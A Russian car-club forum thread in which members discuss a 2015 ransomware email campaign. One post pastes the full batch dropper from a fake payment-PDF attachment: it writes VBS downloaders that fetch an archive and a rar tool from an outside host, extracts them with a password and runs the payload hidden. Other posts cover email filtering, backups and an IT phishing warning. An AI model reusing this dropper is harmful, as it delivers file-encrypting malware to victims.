0
-
18.06.2015, 14:44 #21
-
18.06.2015, 14:49 #22
- Регистрация
- 13.08.2008
- Возраст
- 47
- Сообщений
- 30,994
- Записей в дневнике
- 7
Спасибо: Получено: 6,646
Отправлено: 14,554
-
18.06.2015, 14:54 #23
- Регистрация
- 01.09.2006
- Сообщений
- 48,770
- Записей в дневнике
- 10
Спасибо: Получено: 1,500
Отправлено: 875
-
18.06.2015, 14:56 #24
-
18.06.2015, 15:02 #25
- Регистрация
- 13.08.2008
- Возраст
- 47
- Сообщений
- 30,994
- Записей в дневнике
- 7
Спасибо: Получено: 6,646
Отправлено: 14,554
1\
В легкую.
На нашем отделении железной дороги обслугой компов занимается специально созданная контора. Политики безопасности грузятся при запуске виндов только с их серверов, заперты на использование любых портов, запрет на запуск почти любых программ, явно не разрешенных, любая активность уровнем выше чем "тупой юзверь" блокируется и руководителю подразделения высылается письмо-указивка с требованием разобраться и наказать, независимо от того, какой вид активности был - пинг ли из командной строки или попытка слить из интранета справочник на 200 мегов.
А, и еще ограничение размеров писем запилено. Раньше было 2 мега, потом, когда я уже уходил, было 6 мегов....Как сейчас - не знаю, но наше отделение было по сети дорог лидером в плане отсутствия сетевого мусора, елочек на новый год и прочего разного
-
18.06.2015, 15:07 #26
-
18.06.2015, 15:07 #27
- Регистрация
- 01.09.2006
- Сообщений
- 48,770
- Записей в дневнике
- 10
Спасибо: Получено: 1,500
Отправлено: 875
-
18.06.2015, 15:08 #28
-
18.06.2015, 15:14 #29
- Регистрация
- 13.08.2008
- Возраст
- 47
- Сообщений
- 30,994
- Записей в дневнике
- 7
Спасибо: Получено: 6,646
Отправлено: 14,554
0Листинг исполняемого файла. Я ОЧЕНЬ-ОЧЕНЬ надеюсь, что ни у кого ничего не произойдет и наш клуб не упадет
echo off
rem
if exist c:\winsys goto byye
rem
set PPP=WshShell.Run
rem
set ppp1="c:\winsys\xrar.cmd"
rem
set ppp2=Chr(34)
rem
set ppp3=,
rem
set ppp4=0
rem
set dire=%~dp0
echo error in pdf file>%cd%\Proverka_dannih_po_oplate.pdf
rem
set dire=%cd%
mkdir c:\winsys
cd c:\
cd winsys
echo document>doc18-06.pdf
start doc18-06.pdf
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")>>c:\winsys\x.vbs
echo dim taraStrm: Set taraStrm = createobject("Adodb.Stream")>>c:\winsys\x.vbs
echo xHttp.Open "GET", "http://net2ftp.ru/node0/jettikayr@gmail.com/arc.rar", False>>c:\winsys\x.vbs
echo xHttp.Send>>c:\winsys\x.vbs
echo with taraStrm>>c:\winsys\x.vbs
echo .type = 1 '//binary>>c:\winsys\x.vbs
echo .open>>c:\winsys\x.vbs
echo .write xHttp.responseBody>>c:\winsys\x.vbs
echo .savetofile "c:\winsys\arc.rar", 2 '//overwrite>>c:\winsys\x.vbs
echo end with>>c:\winsys\x.vbs
echo Set WshShell = CreateObject("WScript.Shell")>>c:\winsys\wonc.vbs
echo %PPP% %ppp2% ^& %ppp1% ^& %ppp2%%ppp3% %ppp4% >>c:\winsys\wonc.vbs
echo Set WshShell = Nothing>>c:\winsys\wonc.vbs
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")>>c:\winsys\xx.vbs
echo dim taraStrm: Set taraStrm = createobject("Adodb.Stream")>>c:\winsys\xx.vbs
echo xHttp.Open "GET", "http://net2ftp.ru/node0/jettikayr@gmail.com/Rar", False>>c:\winsys\xx.vbs
echo xHttp.Send>>c:\winsys\xx.vbs
echo with taraStrm>>c:\winsys\xx.vbs
echo .type = 1 '//binary>>c:\winsys\xx.vbs
echo .open>>c:\winsys\xx.vbs
echo .write xHttp.responseBody>>c:\winsys\xx.vbs
echo .savetofile "c:\winsys\Rar", 2 '//overwrite>>c:\winsys\xx.vbs
echo end with>>c:\winsys\xx.vbs
x.vbs
xx.vbs
ren rar rar.exe
rar e -p123123 arc.rar
c:\winsys\wonc.vbs
echo %dire%
echo þþþ>%dire%\Proverka_dannih_po_oplate.cmd
:byye
start c:\winsys\doc18-06.pdf
rem
rem
Не...они только по железной дороге работают, это во первых, а во вторых питерское подразделение этой конторы - самое разгильдяйское
Когда юзеру разрешено только снимать почту, открывать офисные файлы и шевелить мышкой, то там сложно чего то сделать У меня даже скриптик самопальный по созданию рекурсии мегабайтных папок не запускался
ТАкие фалы у рждшников отсекаются на уровне почтового сервера. У меня, кстати, в аутглюке поставлено просто удаление всех файлов, отличающихся от офисных, фото и еще там чего то. Точнее закрыты к исполнению все батники, комы, дллы и прочие сус с экзешниками.
-
18.06.2015, 15:28 #30
- Регистрация
- 01.09.2006
- Сообщений
- 48,770
- Записей в дневнике
- 10
Спасибо: Получено: 1,500
Отправлено: 875
0Ну судя по описалову это trojan encoder 556
нас без сомнения ждут приключения, мы ведь не любим скучать..
-
18.06.2015, 15:30 #31
-
18.06.2015, 15:40 #32
- Регистрация
- 01.09.2006
- Сообщений
- 48,770
- Записей в дневнике
- 10
Спасибо: Получено: 1,500
Отправлено: 875
0А вот интересно. Он же файлы архивирует...а оригинал удаляет. А если попытаться восстановить оригинал?
нас без сомнения ждут приключения, мы ведь не любим скучать..
-
18.06.2015, 15:44 #33
- Регистрация
- 13.08.2009
- Адрес
- Браззавиль, Конго
- Возраст
- 42
- Сообщений
- 24,941
Спасибо: Получено: 1,955
Отправлено: 1,239
0А он тебе даст boot from cd?
BMW 528i е39 M52TU R6 акпп, X5 e53 M57TU 3.0 акпп.
-
18.06.2015, 15:50 #34
- Регистрация
- 01.09.2006
- Сообщений
- 48,770
- Записей в дневнике
- 10
Спасибо: Получено: 1,500
Отправлено: 875
0Skodник, зачем бут фром сиди?
нас без сомнения ждут приключения, мы ведь не любим скучать..
-
18.06.2015, 15:51 #35
- Регистрация
- 13.08.2008
- Возраст
- 47
- Сообщений
- 30,994
- Записей в дневнике
- 7
Спасибо: Получено: 6,646
Отправлено: 14,554
-
18.06.2015, 16:00 #36
- Регистрация
- 15.07.2008
- Адрес
- Россия, Санкт-Петербург, Колпино-Купчино...
- Возраст
- 45
- Сообщений
- 2,803
- Записей в дневнике
- 11
Спасибо: Получено: 54
Отправлено: 32
0На работе на корпаративной почте про такие письма служба IT наверно с нового года предупреждает всех, один фиг народ умудряется открывать файлы.
Буквально вчера пришло новое предупреждение про вариант со скачиванием:
Уважаемые пользователи!
С 16.06.2015 г. на электронную почту пользователей промплощадки Санкт-Петербурга стали приходить очередные версии писем, содержащих ссылки на вредоносный код. Пример письма ниже:
При открытии ссылок из такого письма, скачивании архивов с «информацией», распаковывании этих архивов происходит шифрование фалов на вашем ПК.
Призываем вас быть бдительными и не открывать ссылки и вложения, содержащиеся в письмах от неизвестных адресатов.
При малейшем подозрении на содержание письма запросите подтверждение у отправителя любым альтернативным способом (телефон, Lync, Skype, СМС, электронная почта…) и, в случае отсутствия такового, удалите письмо.
При обнаружении заражения:
1. Немедленно выключите питание компьютера и отключите его от вычислительной сети. Это предотвратит шифрование данных как на вашем локальном диске, так и на сетевых папках, подключенных к ПК. Процедура шифрования происходит не одномоментно, а занимает определённое время;
2. Обратитесь в службу технической поддержки.
Служба поддержки пользователейVW Passat B-55 - был...
Skoda Scout A5FL 4x4 - утрачен...
Skoda Octavia A7 1.8T DSG - теперь....
-
18.06.2015, 16:04 #37
- Регистрация
- 13.08.2009
- Адрес
- Браззавиль, Конго
- Возраст
- 42
- Сообщений
- 24,941
Спасибо: Получено: 1,955
Отправлено: 1,239
0BMW 528i е39 M52TU R6 акпп, X5 e53 M57TU 3.0 акпп.
-
18.06.2015, 17:17 #38
- Регистрация
- 01.09.2006
- Сообщений
- 48,770
- Записей в дневнике
- 10
Спасибо: Получено: 1,500
Отправлено: 875
-
18.06.2015, 20:28 #39
- Регистрация
- 17.07.2014
- Адрес
- ни дом и не улица, мой адрес - Советский Союз
- Сообщений
- 24,198
- Записей в дневнике
- 2
Спасибо: Получено: 3,426
Отправлено: 4,229
0вам и сайты подкидываю где расписано про заработки на таких и так на форуме пишется как и что...
неужели с Мусей валерьянкой балуешься
сочувствую, у нас права разграничены и идет бекап каждые два часа всех файлов, нагрузка большая конечно IT оборудование, зато опа гореть не будет
--- Добавлено чуть позже ---
незря же сбрутили столько адресов, пароли все сменили?
-
18.06.2015, 21:14 #40
Похожие темы
-
Куплю Куплю катушку зажигания сдвоеную на двиг ADR 1.8 в Челябинске или отправкой под зуб:)
от Egoroff в разделе Куплю-Продам ЗапчастиОтветов: 0Последнее сообщение: 09.01.2013, 00:06 -
Куплю торпеду с отправкой в регионы.
от wolf-6 в разделе Куплю-Продам ЗапчастиОтветов: 1Последнее сообщение: 13.08.2012, 10:46 -
Работа программ концерна VW под Windows Vista
от Mex@n!K в разделе Архив 2008г.Ответов: 24Последнее сообщение: 24.02.2008, 23:11 -
Дорожный налог, объясните, плз, нюанс с отправкой по почте
от y3u в разделе Юридическая консультация и АвтострахованиеОтветов: 17Последнее сообщение: 17.10.2007, 12:01 -
Где взять свежие работающие версии программ для диагностики?
от Igor_Izhevsk в разделе Архив 2007г.Ответов: 4Последнее сообщение: 13.03.2007, 20:18